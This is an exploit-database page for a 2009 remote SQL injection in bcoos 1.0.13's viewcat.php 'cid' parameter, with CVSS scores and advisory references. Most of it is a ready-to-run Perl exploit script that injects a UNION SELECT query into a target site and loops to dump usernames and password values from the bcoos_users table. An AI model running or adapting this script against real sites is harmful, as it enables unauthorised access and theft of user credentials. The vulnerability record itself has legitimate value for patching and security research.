bcoos 1.0.13 (viewcat.php cid) Remote SQL Injection Exploit

2009.03.04
Credit: cwh
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 4.6/10
Impact Subscore: 6.4/10
Exploitability Subscore: 3.9/10
Exploit range: Remote
Attack complexity: High
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl -w #============================================ # bcoos 1.0.13 Remote SQL Injection Exploit #============================================ # # ,--^----------,--------,-----,-------^--, # | ||||||||| `--------' | O .. CWH Underground Hacking Team .. # `+---------------------------^----------| # `\_,-------, _________________________| # / XXXXXX /`| / # / XXXXXX / `\ / # / XXXXXX /\______( # / XXXXXX / # / XXXXXX / # (________( # `------' # #AUTHOR : CWH Underground #DATE : 1 December 2008 #SITE : cwh.citec.us # # ##################################################### #APPLICATION : bcoos #VERSION : 1.0.13 (Prior versions also maybe affected) #VENDOR : http://www.bcoos.net/ #DOWNLOAD : http://www.bcoos.net/modules/mydownloads/cache/files/bcoos1.0.13.zip ###################################################### # #Note: magic_quotes_gpc = off #Addresses Modules Must be Installed # ####################################################################################### #Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK ####################################################################################### use LWP::UserAgent; use HTTP::Request; if ($#ARGV+1 != 2) { print "\n==============================================\n"; print " Bcoos Remote SQL Injection Exploit \n"; print " \n"; print " Discovered By CWH Underground \n"; print "==============================================\n"; print " \n"; print " ,--^----------,--------,-----,-------^--, \n"; print " | ||||||||| `--------' | O \n"; print " `+---------------------------^----------| \n"; print " `\_,-------, _________________________| \n"; print " / XXXXXX /`| / \n"; print " / XXXXXX / `\ / \n"; print " / XXXXXX /\______( \n"; print " / XXXXXX / \n"; print " / XXXXXX / .. CWH Underground Hacking Team .. \n"; print " (________( \n"; print " `------' \n"; print " \n"; print "Usage : ./xpl.pl <Target> <Data Limit>\n"; print "Example: ./xpl.pl http://www.target.com/bcoos 10\n"; exit(); } $target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0]; $number = $ARGV[1]; print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++"; print "\n ..:: SQL Injection Exploit By CWH Underground ::.. "; print "\n++++++++++++++++++++++++++++++++++++++++++++++++++++++\n"; print "\n[+]Dump Username and Password\n"; for ($start=0;$start<$number;$start++) { $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n"; $req = HTTP::Request->new(GET => $target."/modules/adresses/viewcat.php?cid=1%27%20and%201=2%20union%20select%201,concat(0x3a3a3a,uname,0x3a3a,pass,0x3a3a3a)%20from%20bcoos_users%20limit%201%20offset%20".$start."--+and+1=1")or die "Failed to Connect, Try again!\n"; $res = $xpl->request($req); $info = $res->content; $count=$start+1; if ($info =~ /:::(.+):::/) { $dump=$1; ($username,$password)= split('::',$dump); printf "\n [$count]\n [!]Username = $username \n [!]Password = $password\n"; } else { print "\n [*]Exploit Done !!" or die "\n [*]Exploit Failed !!\n"; exit; } }

References:

http://xforce.iss.net/xforce/xfdb/46973
http://www.securityfocus.com/bid/32561
http://www.milw0rm.com/exploits/7317
http://secunia.com/advisories/32870
http://osvdb.org/50373


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top